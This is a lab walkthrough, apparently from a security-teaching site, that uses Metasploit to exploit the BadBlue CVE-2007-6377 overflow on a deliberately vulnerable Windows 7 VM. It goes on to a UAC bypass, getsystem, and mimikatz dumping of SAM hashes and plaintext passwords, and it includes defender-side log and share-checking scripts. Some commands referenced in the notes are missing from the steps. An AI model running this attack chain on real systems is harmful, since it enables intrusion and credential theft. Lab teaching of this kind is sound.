(Metasploit: CVE-2007-6377)

Although companies are starting to do a
better job of keeping server software inventories, more often than not
employee workstations are forgotten about. This is a significant
attack vector, because some employees might install file sharing software that has
known vulnerabilities.

For example, BadBlue is an easy-to-use web
server that can reside on an employee's workstation and provides file
sharing functionality. Unfortunately, it has several known
vulnerabilities, which include, but are not limited to, buffer
overflow, command injection and cross-site scripting vulnerabilities.

Imagine that the employee is on public
Wi-Fi and is also connected to their company network. A web server
with a known vulnerability could serve as a staging area to take over the
machine, capture multiple passwords and more.

What is the BadBlue 2.72b PassThru Buffer Overflow Exploit?

Per
CVE-2007-6377, a stack-based buffer overflow in the PassThru
functionality in ext.dll in BadBlue 2.72b and earlier allows remote
attackers to execute arbitrary code via a long query string.
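As an added defender-side example (not from the lesson or the Metasploit project): the CVE text says the overflow is reached through a long query string to ext.dll, so a review of the web server's access log can key on query length for requests to that component. The Common Log Format lines are constructed, and the 512-byte threshold and the lab addresses used as clients are assumptions.

```python
"""Flag oversized query strings aimed at BadBlue's ext.dll in web-server access logs.
Added example for defenders (not part of the lesson). CVE-2007-6377 is triggered by
"a long query string" to the PassThru code in ext.dll, so query length is the
observable. The Common Log Format lines below are constructed with the lab's addresses."""
import re
from urllib.parse import urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
MAX_QUERY_LEN = 512   # assumption: tune to the longest legitimate query you observe

SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '192.168.121.203 - - [09/Mar/2015:14:02:11 -0500] "GET /index.htx HTTP/1.1" 200 2048',
    '192.168.121.203 - - [09/Mar/2015:14:02:12 -0500] "GET /ext.dll?page=index HTTP/1.1" 200 1312',
    '192.168.121.207 - - [09/Mar/2015:14:05:40 -0500] "GET /ext.dll?' + "A" * 1400 + ' HTTP/1.1" 500 0',
    "garbage line that does not parse",
]

def parse_line(line):
    """Return (client, method, path, query, status) or None when the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, method, target, status = m.groups()
    parts = urlsplit(target)          # splits "/ext.dll?..." into path and query
    return client, method, parts.path, parts.query, int(status)

def flag_long_queries(lines, component="ext.dll", max_len=MAX_QUERY_LEN):
    """Return [(client, path, query_len, status)] for queries to `component` longer than max_len."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:               # skip lines the regex cannot parse instead of crashing
            continue
        client, _method, path, query, status = rec
        if path.lower().endswith("/" + component) and len(query) > max_len:
            hits.append((client, path, len(query), status))
    return hits
```

A 500 status on the flagged request is also worth correlating with a BadBlue process crash or restart on the workstation.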

What is Metasploit?

The Metasploit Framework is an open-source
penetration testing tool used for developing and executing exploit code against
a remote target machine. The Metasploit Framework has the world's
largest database of publicly tested exploits. In simple words, Metasploit
can be used to test the vulnerability of computer systems in order to
protect them; on the other hand, it can also be used to break into
remote systems.

Special thanks go out to the founder of
Metasploit, HD Moore (@hdmoore).

What is mimikatz?

Mimikatz is a tool that pulls plain-text
passwords out of WDigest, interfaced through LSASS. WDigest is a
DLL, first added in Windows XP, that is used to authenticate users in
HTTP Digest authentication and Simple Authentication and Security Layer
(SASL) exchanges. Both of these require the user's plain-text password
in order to derive the authentication key, which is why it is stored in
plain text.

Special thanks go out to the mimikatz
author, Benjamin DELPY (@gentilkiwi),
for his game-changing work.

I wanted to thank my good friend Carlos
Cajigas (@carlos_cajigas)
for creating LosBuntu and for his generous guidance and mentorship in
Cyber Forensics.

LosBuntu
is a Linux Live DVD distribution (distro) that can be used to assist in
data forensic investigations. It is a compilation of Master Cajigas'
many years of experience as a former law enforcement agent and IBM
forensics investigator.

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.

Note(FYI):
LosBuntu will be used later to forensically collect a memory snapshot of the
BadBlue Metasploit Attack Vector.

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Select LosBuntu

Click Edit Virtual Machine Settings

Configure Memory

Instructions:

Click on Memory.

Increase the memory to 1 GB

Note(FYI):

LosBuntu really needs 1.5 to 2 GB;
however, you will have 3 Virtual Machines running at the same time.
You are just using LosBuntu to collect memory for this lesson.

Do NOT click the OK button; we still have more to configure.

Configure CD/DVD(IDE)

Instructions:

Click on CD/DVD(IDE)

Device status: Check Connect at power on

Connection: Click Use physical drive

Select Auto detect

Note(FYI):

Do NOT click the OK button; we still have more to configure.

Configure Network Adapter

Instructions:

Click on Network Adapter

Device status: Check Connect at power on

Network Connection: Click NAT: Used to share the ....

Click the OK Button

Note(FYI):

We will
use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection. In
order to dump the memory, Kali, Damn Vulnerable Windows 7, and
LosBuntu will use NAT.

Play LosBuntu Virtual Machine

Instructions:

Select LosBuntu

Click Play virtual machine

Section 2: Login to LosBuntu

Login to LosBuntu

Instructions:

Password: mtk

Press <Enter>

Open Terminal Windows

Instructions:

Click on the Terminal Window

Become root

Instructions:

sudo su -

password: mtk

pwd

Note(FYI):

Command #1, Use (sudo su -) to simulate
an initial root login where /etc/profile, .profile and .bashrc
are executed. Not only will the root user's environment be present,
but the root user will also be placed in its own home directory
(/root).

Command #2, Use (pwd) to display the
current working directory of the particular user.

Obtain IP Address

Instructions:

ifconfig -a

Record Your IP Address

Note(FYI):

Command #1, Use (ifconfig) to view all
(-a) IP Addresses associated with LosBuntu. You should only have
two interfaces: eth0 and lo.

eth0 - Is the primary interface.
In my case, the IP Address is
192.168.121.203.

lo - Is the local loopback
address. The loopback address is used to establish an IP
connection to the same machine or computer being used by the
end-user. The loopback construct gives a computer or device
capable of networking the capability to validate or establish
the IP stack on the machine.

If your host machine has Internet
Connectivity, but LosBuntu does not have an IP Address associated
with eth0, then issue the following command as root.

dhclient -v

Section 3: Configure Samba

Create Forensics Directory (On LosBuntu)

Instructions:

mkdir -p /forensics/badblue

chown -R mtk:mtk /forensics

chmod -R 770 /forensics

ls -ld /forensics/badblue

Note(FYI):

Command #1, Use (mkdir) to create the
(/forensics/badblue) directory, and use the (-p) flag to suppress errors
if the directory already exists.

Command #2, Use (chown) to change the
user and group ownership of the (/forensics) directory and all underlying
directories and files to user mtk and group mtk.

Command #3, Use (chmod) to set the
read/write/execute permissions for both user and group for the
(/forensics) directory and all underlying directories and files.

Command #4, Use (ls) with the flags
(-ld) to show the (/forensics/badblue) directory entry itself in long format.

Open Samba Configuration File

Instructions:

cd /etc/samba

cp smb.conf smb.conf.BKP

gedit smb.conf > /dev/null 2>&1 &

Note(FYI):

Command #1, Use (cd) to enter the
(/etc/samba) directory.

Command #2, Use (cp) to make a backup
copy of the samba configuration file (smb.conf).

Command #3, Use (gedit) to open the (smb.conf)
file from the command line, and use (&) to run it in the background. Use the
redirect operators (> /dev/null 2>&1) to send both standard output and
standard error into a black hole (/dev/null).

Open Samba Preference

Instructions:

Click Edit

Select Preferences

Display Line Number

Instructions:

Check Display line numbers

Click the Close Button

Add Forensics Directory

Instructions:

Scroll Down to line 262

Append forensics/badblue to the end of the slash /

Note(FYI):

Command #2, Line 262 should look like
the below.

path = /forensics/badblue

Save File

Instructions:

File --> Save

Quit gedit

Instructions:

File --> Quit

Restart the Samba Service

Instructions:

service smbd restart

Note(FYI):

Command #1, Use (service) to restart
the Samba (i.e., smbd) service.
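An added check for the evidence share configured in this section (example code, not part of the lesson or of LosBuntu): it pulls each share's path out of smb.conf text and verifies that the directory keeps the chmod 770 posture from Section 3, with no access bits for "other". The smb.conf fragment is constructed; the mtk ownership check is left out so the example runs under any account.

```python
"""Validate a Samba share staged for forensic evidence (added example, not from the lesson).
Checks that each share directory keeps the lesson's chmod 770 posture: no bits for "other".
The smb.conf fragment below is constructed."""
import os
import re
import stat
import tempfile
# Constructed fragment mirroring the lesson's edit (path = /forensics/badblue).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
; the share used as the evidence drop point
[forensics]
   path = /forensics/badblue
   writable = yes
   guest ok = no
"""

def share_paths(conf_text):
    """Return {share_name: path} for every non-[global] section that defines a path."""
    paths, section = {}, None
    for raw in conf_text.splitlines():
        line = re.split(r"[;#]", raw, maxsplit=1)[0].strip()   # strip smb.conf comments
        if not line:
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            section = header.group(1).strip()
            continue
        key, sep, value = line.partition("=")
        if sep and section and section.lower() != "global" and key.strip().lower() == "path":
            paths[section] = value.strip()
    return paths

def check_share_dir(path, expected_mode=0o770):
    """Return findings for `path`; an empty list means it matches chmod 770."""
    if not os.path.isdir(path):
        return [f"{path}: directory missing"]
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = []
    if mode & 0o007:
        findings.append(f"{path}: world-accessible bits set ({oct(mode)})")
    if mode != expected_mode:
        findings.append(f"{path}: mode {oct(mode)} differs from {oct(expected_mode)}")
    return findings

def demo():
    """Run both checks against a temporary directory; returns (paths, good, bad)."""
    paths = share_paths(SAMPLE_SMB_CONF)
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o770)          # the lesson's setting
    good = check_share_dir(tmp)
    os.chmod(tmp, 0o777)          # the weak setting: world read/write/execute
    bad = check_share_dir(tmp)
    os.rmdir(tmp)
    return paths, good, bad
```

Run share_paths() over the real /etc/samba/smb.conf and feed each path to check_share_dir() before restarting smbd.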

Section 4: Start your Windows 7 VM

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Click on Damn Vulnerable Windows 7

Click on Edit virtual machine settings

Configure CD/DVD (IDE)

Instructions:

Select CD/DVD (IDE)

Click on the Use physical drive: radio button

Select Auto detect

Note(FYI):

Do not click on the OK Button

Configure Memory

Instructions:

Select Memory

Click on "512 MB"

Note(FYI):

Temporarily lower the amount of memory
to 512 MB to limit the size of the
memory dump file that we will
later analyze in a subsequent lesson.

Configure Network Adapter

Instructions:

Select Network Adapter

Click the radio button "NAT: Used to share the host's IP address"

Click the OK button

Note(FYI):

We will use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection.

Start Damn Vulnerable Windows 7

Instructions:

Click on Damn Vulnerable Windows 7

Click on Play virtual machine

Section 5: Login to Windows 7

Select Login User

Instructions:

Click on Security Student

Note(FYI):

Security Student does belong to the
Administrators group.

Login as Security Student

Instructions:

Supply the student password (abc123).

Click on the arrow

Section 6: Verify you have a Network IP Address

Bring up Command Prompt

Instructions:

Click the Windows Start Button

Type cmd in the search box

Right Click on cmd

Select Run as administrator

Note(FYI):

It is imperative that you open the cmd
as the administrator. We will later use this command terminal
to set the Administrator password.

User Account Control

Instructions:

Click on the Yes Button

Record IP Address

Instructions:

ipconfig

Record your IP Address

Notes(FYI):

In my case, my IP Address is
192.168.121.172.

In your case, your IP Address will
probably be different.

Create BadBlue Forensics Directory

Instructions:

mkdir Z:\badblue

dir Z:\badblue

Notes(FYI):

The Z: Drive represents a "virtual"
thumb drive that you created and attached in the previous
Metasploit: MS12-020 lesson. Obviously, a forensics
investigator would/could use a write blocker with a real thumb drive
and more.

Change Administrator's Password

Instructions:

net users administrator Try2H4ckMe!

Notes(FYI):

Command #1, Change the administrator
password to (Try2H4ckMe!).
This looks like a difficult password to crack, but you will soon be
amazed by the magic of mimikatz.

Section 7: Configure Firefox

Open Firefox (On Damn Vulnerable Windows 7)

Instructions:

Click the Windows Start Button

Search for firefox

Click Mozilla Firefox

Firefox Options

Instructions:

Click on Tools

Select Options

File Save Location

Instructions:

Click on General

Click on Always ask me where to save files

Click the X to close the Options tab.

Note(FYI):

This will allow you to specify the
download directory when saving files.

We will save WinPMEM on the FORENSICS (Z:)
Drive, which acts as our virtual thumb drive. You should
not save or download your memory acquisition tool to the (C:) Drive.

Section 9: Start BadBlue

Start BadBlue (On Damn Vulnerable Windows 7)

Instructions:

Right Click on the BadBlue Icon

Select Open

Minimize BadBlue

Instructions:

Minimize BadBlue

Close BadBlue Webpage

Instructions:

Click File

Select Exit

Section 10: Switch User to Administrator

Switch User (On Damn Vulnerable Windows 7)

Instructions:

Click the Start Button

Click the Arrow next to Shutdown

Click Switch user

Note(FYI):

We are switching users instead of logging
out to simulate a Windows Server having multiple users logged into a
system during an attack.

Login as Administrator

Instructions:

Click on Administrator

Provide Password

Instructions:

Supply the Administrator password (Try2H4ckMe!).

Click on the arrow

BadBlue Error

Instructions:

Click the OK Button

Note(FYI):

This error occurred because BadBlue was
already started by the student user.

Minimize BadBlue

Instructions:

Minimize BadBlue

Section 11: Configure Kali Virtual Machine Settings

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Click on Kali

Edit Virtual Machine Settings

Note:

Before beginning a lesson it is
necessary to check the following VM settings.

Configure CD/DVD

Instructions:

Click on CD/DVD (IDE)

Click on the radio button "Use physical drive:"

Select Auto detect

Set Network Adapter

Instructions:

Click on Network Adapter

Click the radio button "NAT: Used to share the host's IP Address"

Click the OK Button

Note(FYI):

We will
use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection. In
order to dump the memory, Kali, Damn Vulnerable Windows 7, and LosBuntu
will use NAT.

Section 12: Play and Login to Kali

Start Up Kali

Instructions:

Click on Kali

Play virtual machine

Supply Username

Instructions:

Click Other...

Username: root

Click the Log In Button

Supply Password

Instructions:

Password: <Provide your Kali root password>

Click the Log In Button

Open a Terminal Window

Instructions:

Click on Applications

Accessories --> Terminal

Obtain Kali's IP Address

Instructions:

ifconfig

Record your IP Address

Note(FYI):

Command #1, Use (ifconfig) to display Kali's
IP Address.

Command #2, Record your IP Address.

Mine is
192.168.121.207.

Yours will probably be different.

If your host machine has Internet
Connectivity, but Kali does not have an IP Address associated
with eth0, then issue the following command as root.

dhclient -v

Section 13: Start Typescript

Start A Typescript

Instructions:

script /root/bad_blue.txt

Notes(FYI):

Command #1, Use (script) to make a typescript of
the terminal session. It is
useful for students who need a hardcopy record of an interactive
session as proof of an assignment. Basically, all input and output
will be stored in the file (bad_blue.txt). It can be helpful for
troubleshooting purposes.

Command #1, Use (nmap) to scan (Damn
Vulnerable Windows 7 VM). Use the (-p) flag to scan port
http/80 and use (-sV) to display the version.

Section 15: It's Metasploit Time

Start msfconsole

Instructions:

msfconsole

Note(FYI):

Command #1, The msfconsole provides an
"all-in-one" centralized console and allows you efficient access to
virtually all of the options available in the MSF.

Your banner picture will probably be
different. To change the picture, just type the word banner.

Search for BadBlue

Instructions:

search badblue

use exploit/windows/http/badblue_passthru

Note(FYI):

Command #1, The (search) command allows
the user to search the module names and descriptions for the string
(badblue).

Command #2, The (use) command allows
the user to set/use the particular module.

BadBlue Info

Instructions:

info

Notice we will have to set the RHOST
(the target address)

Note(FYI):

Command #1, The (info) command allows
the user to display information about the particular module.
It also allows the user to see which options are required to be set
before implementing the specific attack vector.

Command #2, Use (background) to place
the meterpreter session in the background, which allows you to
additionally load the bypassuac
module.

Command #3, Use (sessions) to display
the meterpreter session we placed in the background.

Send UAC Bypass

Instructions:

use exploit/windows/local/bypassuac

show options

set SESSION 1

"1" as in the number one.

exploit

Note(FYI):

Command #1, This is a post-exploitation
module that escalates privileges by bypassing UAC (User Account Control)
protection.

Command #2, Show options. Notice the
SESSION variable needs to be set.

Command #3, Set the SESSION variable to
Meterpreter session 1.

Command #4, Exploit away. Notice
the stage being sent and creation of a new meterpreter connection.

Get SYSTEM

Instructions:

getuid

getsystem

getuid

Note(FYI):

Command #1, Use (getuid) to display the
username. Notice the username is student.

Command #2, Use (getsystem) to escalate
the user privilege of the current session to the SYSTEM (aka
administrator) account. This is why your general user account
should not have administrative privileges.

Command #3, Notice the username is now
SYSTEM, which has Administrator privileges.

Section 16: It's Mimikatz Time

Load mimikatz

Instructions:

load mimikatz

mimikatz_command -f version

help mimikatz

Note(FYI):

Command #1, Use (load mimikatz) to load
the Mimikatz module into memory.

Command #2, Display the mimikatz
version.

Command #3, Display the Mimikatz module
commands and descriptions.

msv credentials

Instructions:

msv

Note(FYI):

Command #1, Use msv to display the msv
credentials.

Notice the use of NTLM. NTLM is a
suite of authentication and session security protocols used in
various Microsoft network protocol implementations. It is best
recognized as part of the "Integrated Windows Authentication", which
means there is the potential to retrieve the clear text password if
that particular user is logged into the system during the attack.

Mimikatz Native Features

Instructions:

mimikatz_command -f fu::

Note(FYI):

Command #1, Display a complete list of
the available modules. This is the native way of running
mimikatz. Notice here you have the ability to see processes,
drivers, samdump and more.

Mimikatz Samdump

Instructions:

mimikatz_command -f samdump::

Note(FYI):

Command #1, Display the samdump
options.

Mimikatz Samdump Hashes

Instructions:

mimikatz_command -f samdump::hashes

Note(FYI):

Command #1, Display the SAM Database
Hashes.

Mimikatz Wdigest

Instructions:

wdigest

Note(FYI):

Command #1, Use the mimikatz metasploit
module (wdigest) to display all the passwords of users that are
currently logged into the server. (Are you scared yet?).